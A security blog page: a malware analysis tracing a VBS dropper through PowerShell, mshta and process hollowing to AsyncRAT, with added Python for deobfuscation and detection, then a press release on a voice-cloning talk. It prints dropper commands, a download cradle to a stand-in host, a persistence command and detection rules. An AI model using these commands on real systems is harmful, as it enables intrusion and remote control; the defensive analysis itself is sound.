Thursday, July 15, 2021

Reverse Engineering AsyncRat Payload

As part of some current research I am doing, I decided to analyse malicious samples in VBS and PS1 formats to understand what techniques APTs and other malicious actors use for obfuscation. This led me to discover AsyncRAT, which I reverse engineered, and I wanted to share my experiences and findings with the community.

AsyncRAT is a remote access/administration tool used to control computers remotely. It is also abused by malicious actors: Chinese APT groups have been observed using it to steal personal information and other sensitive data.

The sample that I used can be found at this link (uploaded on the 12th of July 2021):

This is an in-the-wild payload that chains several obfuscation and file-dropping techniques, with the end goal of downloading and running AsyncRAT for remote control.

The sample being analysed is a VBS payload; its hashes can be seen in screenshot 1.1 below:


file.vbs contains PowerShell commands obfuscated through string replacement and string splitting, together with code that downloads further files, as shown in screenshot 1.2.



The VBS payload uses WScript to run the command “powershell -Command (New-Object Net.WebClient).DownloadString('''') | IEX” (the URL argument is omitted from this write-up), which downloads the contents of the specified URL and executes them in memory through Invoke-Expression.

Browsing to this URL redirects to a second URL that is supposed to serve a JPG image, but the image does not load, as shown in screenshot 1.3.


Downloading and inspecting the “picture” reveals that it is PowerShell code (shown in 1.4).


The PowerShell stage that runs in memory downloads several more files, rebuilds strings through replace and concatenate operations, and again executes its result in memory.

At the beginning of the script a directory tree is created recursively under C:\ProgramData\Microsoft Arts\Start, as shown in the first highlight of screenshot 1.5.

Further on, the script sets three locations:

  • C:\ProgramData\Microsoft Arts\Start\
  • C:\Users\Public\
  • C:\Users\Public\

The path literals are obfuscated by splicing random strings into them, which the script strips out again with string replacement at runtime, as shown in the second highlight of 1.5.

Next the script downloads three files into the locations above, a .lnk, a .bat and a .ps1 respectively, and then executes the .lnk file.


The .lnk file is a shortcut that executes the .bat file from the second location, as shown in 1.6.


The .bat file runs mshta with a vbscript:Execute(...) argument on the command line; the embedded VBScript in turn launches a PowerShell command through WScript, as shown in screenshot 1.7.


De-obfuscated, that PowerShell command runs the .ps1 file downloaded earlier, with the execution policy bypassed on the command line:

powershell -ExecutionPolicy Bypass C:\Users\Public\MIfat7uauRiR3nHRG9cv.ps1

The .ps1 script contains a short sleep, two large byte arrays (the script treats them as “shellcode”, but as screenshot 1.11 shows they are .NET assemblies) and an assembly load and invoke, highlighted in screenshot 1.8.


Each byte array is stored as a string in which a fixed junk pattern stands in for the digit 0; the script swaps the pattern back at runtime, and doing the same find & replace by hand recovers the original strings. Because they are strings, the script calls a helper function to convert each one into bytes.

The converted bytes are stored in byte-array variables that are used further down the script.

One oddity: the variable H5 is assigned twice with exactly the same payload, which changes nothing (see 1.9).

Finally, the last line loads an assembly from these byte arrays and invokes it, passing the variable ali, a string holding the path of aspnet_compiler.exe from the .NET Framework.

Let’s recover the binaries from those byte arrays by writing each one to a file after conversion to bytes, having first removed the last line so that we do not execute the payload ourselves.
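The two manual steps above, stripping the junk from the path literals and swapping the junk pattern back to 0 before converting the byte arrays, can be scripted so that the recovery is repeatable across samples. The following Python is an added example by the editor, not the sample's code or the author's script: the dropper text inside it is constructed to mirror the techniques described in the post ($ali, $H5 and $H6 are the variable names from the post; the junk patterns 'XYZ', 'QQ' and '#~', the plain-hex encoding of the byte arrays, the full aspnet_compiler.exe path and the 16-byte DOS-header stubs are assumptions made for the example).

```python
"""Recover the staged paths and binaries from an obfuscated PowerShell dropper.

Editor-added example; not code from the sample or from the post. DROPPER is a
CONSTRUCTED stand-in for the downloaded .ps1: junk strings spliced into path
literals and removed with .Replace(), and byte arrays stored as hex strings in
which the junk pattern '#~' stands in for the digit 0. The junk patterns, the
hex encoding, the aspnet_compiler.exe path and the 16-byte stubs are assumed.
"""
import hashlib
import re
from pathlib import Path

# Real samples carry tens of kilobytes of hex; $H5/$H6 here are just the first
# 16 bytes of a PE file so that the MZ check below has something to find.
DROPPER = r"""
Start-Sleep -s 3
$ali = ('C:\WindXYZows\Microsoft.NET\FraXYZmework\v4.0.30319\aspnet_compiler.exe').Replace('XYZ','')
$dir = ('C:\ProgramData\MicroQQsoft Arts\StQQart\').Replace('QQ','')
$H5 = '4D5A9#~#~#~#~3#~#~#~#~#~#~#~4#~#~#~#~#~#~FFFF#~#~#~#~'.Replace('#~','0')
$H6 = '4D5A#~#~#~#~#~1#~#~#~#~#~#~#~2#~#~#~#~#~#~FFFF#~#~#~#~'.Replace('#~','0')
"""

# A single-quoted literal, optionally followed by ')', then one or more chained
# .Replace('old','new') calls.
LITERAL_WITH_REPLACES = re.compile(
    r"'(?P<lit>[^']*)'\)?(?P<chain>(?:\.Replace\('[^']*','[^']*'\))+)")
REPLACE_CALL = re.compile(r"\.Replace\('([^']*)','([^']*)'\)")
ASSIGNMENT = re.compile(r"^\s*\$(?P<name>\w+)\s*=\s*\(?\s*(?P<rest>.*)$", re.M)


def resolve_literal(lit, chain):
    """Apply a chain of .Replace() calls left to right, as PowerShell would at
    runtime. This is the manual find & replace step, automated."""
    value = lit
    for old, new in REPLACE_CALL.findall(chain):
        value = value.replace(old, new)
    return value


def resolve_assignments(script):
    """Map variable name -> de-obfuscated string for every assignment whose
    right-hand side is a literal with .Replace() calls; other lines are ignored."""
    resolved = {}
    for assign in ASSIGNMENT.finditer(script):
        m = LITERAL_WITH_REPLACES.search(assign.group("rest"))
        if m:
            resolved[assign.group("name")] = resolve_literal(m.group("lit"), m.group("chain"))
    return resolved


def to_bytes(hex_text):
    """Stand-in for the sample's string-to-bytes helper (hex pairs assumed)."""
    return bytes.fromhex(hex_text)


def recover_payloads(script):
    """Return {name: (raw bytes, sha256 hex, starts with MZ)} for every resolved
    variable whose value is an even-length hex string. Path variables such as
    $ali fail the hex check and are left out."""
    payloads = {}
    for name, value in resolve_assignments(script).items():
        if len(value) % 2 == 0 and re.fullmatch(r"[0-9A-Fa-f]+", value):
            blob = to_bytes(value)
            payloads[name] = (blob, hashlib.sha256(blob).hexdigest(), blob[:2] == b"MZ")
    return payloads


def dump_payloads(payloads, out_dir):
    """Write each recovered blob to <out_dir>/<name>.bin for ILSpy, strings, etc."""
    out = Path(out_dir)
    out.mkdir(parents=True, exist_ok=True)
    for name, (blob, _, _) in payloads.items():
        (out / f"{name}.bin").write_bytes(blob)


if __name__ == "__main__":
    for name, value in resolve_assignments(DROPPER).items():
        print(f"${name} = {value}")
    for name, (blob, digest, is_pe) in recover_payloads(DROPPER).items():
        print(f"${name}: {len(blob)} bytes, MZ={is_pe}, sha256={digest}")
```

The MZ check is the quick sanity test before opening anything in ILSpy: if a recovered blob does not start with MZ, the junk pattern or the encoding assumption is wrong for that sample and the replace step needs adjusting, not the decompiler. Keep the last line of the real script out of anything you paste into a PowerShell session.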


With the files recovered, we perform some initial analysis on them:


We will return to the .ps1 script shortly, since its last line uses both binaries; first we need to understand what happens there: H5 is the one that gets loaded as an assembly and executed.

Loading the H5 payload in ILSpy, we are presented with the following:


The set of Win32 API calls in screenshot 1.11 immediately identifies this as process hollowing, which makes perfect sense: the last line of the script starts aspnet_compiler.exe as the sacrificial host process and replaces its image with the H6 binary, which is the actual malware.

The last command is:

[Reflection.Assembly]::Load($H5).GetType('VNPT.B').GetMethod('NET').Invoke($null,[object[]] ($ali,$H6))   

The H5 assembly is loaded in memory and its NET method on the type VNPT.B is invoked with the parameters aspnet_compiler.exe ($ali) and the H6 binary, as shown in screenshot 1.12.


Next, let’s have a look at what the actual malware can do.

The H6 binary is obfuscated and uses key-based encryption; it has several evasion features against debuggers and VMs (shown in screenshot 1.13) and performs host reconnaissance, collecting the hostname, the installed AV product (shown in screenshot 1.14) and more.



Screenshot 1.15 shows some of its features, and screenshot 1.16 shows persistence through a scheduled task that runs a .bat file at logon.
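From a defender's side, every hop of the chain described above (WScript launching a PowerShell download cradle, mshta with inline VBScript, PowerShell bypassing the execution policy on a .ps1 in a staging directory, aspnet_compiler.exe spawned by PowerShell as the hollowing host, and an on-logon scheduled task running a .bat) is visible in process-creation telemetry. The following Python is an added example by the editor, not code from the post and not a vendor rule set: it runs narrow per-event rules over constructed Sysmon-style events and then checks whether the hits sit on one parent/child ancestry. The PIDs, the download URL, the .lnk/.bat names, the exact mshta and schtasks command lines and the two benign look-alike events are assumptions; only the chain's structure, the .ps1 file name and the staging directories come from the post.

```python
"""Detection logic for the delivery chain described in this post.

Editor-added example; not code from the post and not a vendor rule set. It runs
over CONSTRUCTED process-creation events in a Sysmon event 1-like shape that
mirror the chain: wscript -> powershell DownloadString | IEX -> .lnk -> .bat ->
mshta vbscript:Execute -> powershell -ExecutionPolicy Bypass <.ps1> -> hollowed
aspnet_compiler.exe -> on-logon scheduled task. PIDs, URL, file names, the mshta
and schtasks command lines and the benign events are assumptions.
"""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    ppid: int
    image: str         # full path of the created process
    parent_image: str  # full path of its parent
    cmdline: str


def base(path):
    """Lower-cased file name of an image path."""
    return path.rsplit("\\", 1)[-1].lower()


PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SYS32 = r"C:\Windows\System32"
ASPNET = r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"

# Constructed timeline of the chain (pids 400-460), then two benign look-alikes.
EVENTS = [
    ProcEvent(400, 300, SYS32 + r"\wscript.exe", r"C:\Windows\explorer.exe",
              r"wscript.exe C:\Users\bob\Downloads\file.vbs"),
    ProcEvent(410, 400, PS, SYS32 + r"\wscript.exe",
              "powershell -Command (New-Object Net.WebClient).DownloadString('http://dropper.example/x.jpg') | IEX"),
    # the .lnk's target is the .bat, so the in-memory stage ends up spawning cmd.exe
    ProcEvent(420, 410, SYS32 + r"\cmd.exe", PS, r"cmd.exe /c C:\Users\Public\stage.bat"),
    ProcEvent(430, 420, SYS32 + r"\mshta.exe", SYS32 + r"\cmd.exe",
              r'mshta vbscript:Execute("CreateObject(""WScript.Shell"").Run ""powershell -ExecutionPolicy Bypass C:\Users\Public\MIfat7uauRiR3nHRG9cv.ps1"",0:close")'),
    ProcEvent(440, 430, PS, SYS32 + r"\mshta.exe",
              r"powershell -ExecutionPolicy Bypass C:\Users\Public\MIfat7uauRiR3nHRG9cv.ps1"),
    ProcEvent(450, 440, ASPNET, PS, "aspnet_compiler.exe"),
    ProcEvent(460, 450, SYS32 + r"\schtasks.exe", ASPNET,
              r'schtasks /create /f /sc onlogon /tn "Updater" /tr "C:\Users\Public\update.bat"'),
    ProcEvent(500, 300, PS, r"C:\Windows\explorer.exe",
              r"powershell -ExecutionPolicy Bypass C:\Scripts\backup.ps1"),
    ProcEvent(510, 505, ASPNET, r"C:\Program Files\MSBuild\msbuild.exe", "aspnet_compiler.exe -v / -p site"),
]

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
STAGING_DIRS = re.compile(r"(?i)(\\users\\public\\|\\programdata\\)")

# Each rule is deliberately narrow so a single hit is meaningful on its own;
# score_chain() adds the parent/child context.
RULES = {
    "script_host_download_cradle": lambda e:
        base(e.parent_image) in SCRIPT_HOSTS and base(e.image) == "powershell.exe"
        and re.search(r"(?i)downloadstring", e.cmdline)
        and re.search(r"(?i)\biex\b|invoke-expression", e.cmdline),
    "mshta_inline_vbscript": lambda e:
        base(e.image) == "mshta.exe" and re.search(r"(?i)vbscript:", e.cmdline),
    "bypass_ps1_from_staging_dir": lambda e:
        base(e.image) == "powershell.exe"
        and re.search(r"(?i)-executionpolicy\s+bypass|-ep\s+bypass", e.cmdline)
        and re.search(r"(?i)\.ps1\b", e.cmdline) and STAGING_DIRS.search(e.cmdline),
    "aspnet_compiler_spawned_by_powershell": lambda e:
        base(e.image) == "aspnet_compiler.exe" and base(e.parent_image) == "powershell.exe",
    "logon_task_runs_bat": lambda e:
        base(e.image) == "schtasks.exe" and re.search(r"(?i)/create", e.cmdline)
        and re.search(r"(?i)/sc\s+onlogon", e.cmdline) and re.search(r"(?i)\.bat\b", e.cmdline),
}


def match_rules(event):
    """Names of every rule that fires on one event."""
    return [name for name, pred in RULES.items() if pred(event)]


def score_chain(events):
    """Return (sorted names of rules fired anywhere, True if a hollowing host
    descends from a download cradle). Several distinct rules on one ancestry
    is the signal worth paging on; a lone bypass_ps1 hit usually is not."""
    by_pid = {e.pid: e for e in events}
    fired = {name for e in events for name in match_rules(e)}
    linked = False
    for e in events:
        if "aspnet_compiler_spawned_by_powershell" not in match_rules(e):
            continue
        cur, seen = by_pid.get(e.ppid), set()
        while cur is not None and cur.pid not in seen:   # walk up, guard against pid reuse loops
            seen.add(cur.pid)
            if "script_host_download_cradle" in match_rules(cur):
                linked = True
            cur = by_pid.get(cur.ppid)
    return sorted(fired), linked


if __name__ == "__main__":
    for e in EVENTS:
        print(e.pid, base(e.image), match_rules(e))
    print(score_chain(EVENTS))
```

The benign events show why the rules are scoped the way they are: an admin running a .ps1 with the policy bypassed from C:\Scripts, or MSBuild legitimately invoking aspnet_compiler.exe, fires nothing, while the same binaries in the sample's parent/child arrangement light up every stage. Port 6666 beaconing would be the matching network-side rule, but it belongs in connection telemetry rather than process events.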


The malware beacons to its C2 domain on port 6666, but also contacts a second domain, possibly in an attempt to look legitimate, as observed in screenshot 1.17.


In conclusion, based on public resources the H6 binary is AsyncRAT.

- Blog post by Thanasis (trickster0) of Telspace Systems

Thursday, April 1, 2021

Telspace Systems Security Analyst Speaks about “Voice Cloning” Attacks

Amy Manià to Appear at The Boston Security Meetup in April 2021


SOUTH AFRICA, JOHANNESBURG – March 17 2021 – Telspace Systems, a provider of vendor-independent information / cyber security solutions for the public and private sectors across a broad array of industries, both local and international, announces today that one of its OSCP Certified Security Analysts, Amy Manià, will be speaking on the subject of Deep Fakes and Voice Cloning at the prestigious Boston Security Meetup in Cambridge, MA, in mid-April (date not yet finalised). The Meetup is a self-described “safe place” for InfoSec people to meet like-minded people, share “cool ideas,” and discuss real issues.


The Boston area has one of the most diverse information security ecosystems in the world, and the Meetup will serve as a springboard to further shine a spotlight on Ms. Manià’s industry-leading research and insights, which help businesses avoid falling victim to cyber-attacks and deep fakes and keep sensitive information safe.


“Telspace underscores its commitment to protecting our customer’s financial and customer data,” states Dino Covotsos, Founder and CEO of Telspace Systems. “We see prevention as a vital aspect including educating the public, training security analysts, and helping customers get out ahead of the latest attacker tactics, techniques and procedures (TTPs).”


“When watching Deep Fake videos, I quickly realized that the software capabilities of manipulating visual material seemed to be far ahead of the audio,” states Amy Manià. “That is how I began to wonder about the possibilities of cloning a voice. In 2019, I was able to fool my father and a longtime friend using a software-generated version of my own voice.”


Ms. Manià’s body of research, entitled "Put Words In My Mouth", may be explored online; the linked page collects one of her podcast appearances, a whitepaper, and recorded conference talks.


To learn more about Telspace Systems, please visit


# # #

About Telspace Systems

Since 2002, Telspace Systems, headquartered in South Africa, has provided information / cyber security solutions for the public and private sectors both locally and internationally. Telspace focuses on vendor-independent reporting methodologies and serves a broad array of industries, including government, financial services, telecommunications, petroleum, logistics, entertainment, transportation, legal, human resources, and ISPs. To learn more, please visit Telspace Systems and follow us on LinkedIn, Facebook, and Twitter.

Media Contact for Telspace Systems:

Media Team

Tel: +27 10 590 6163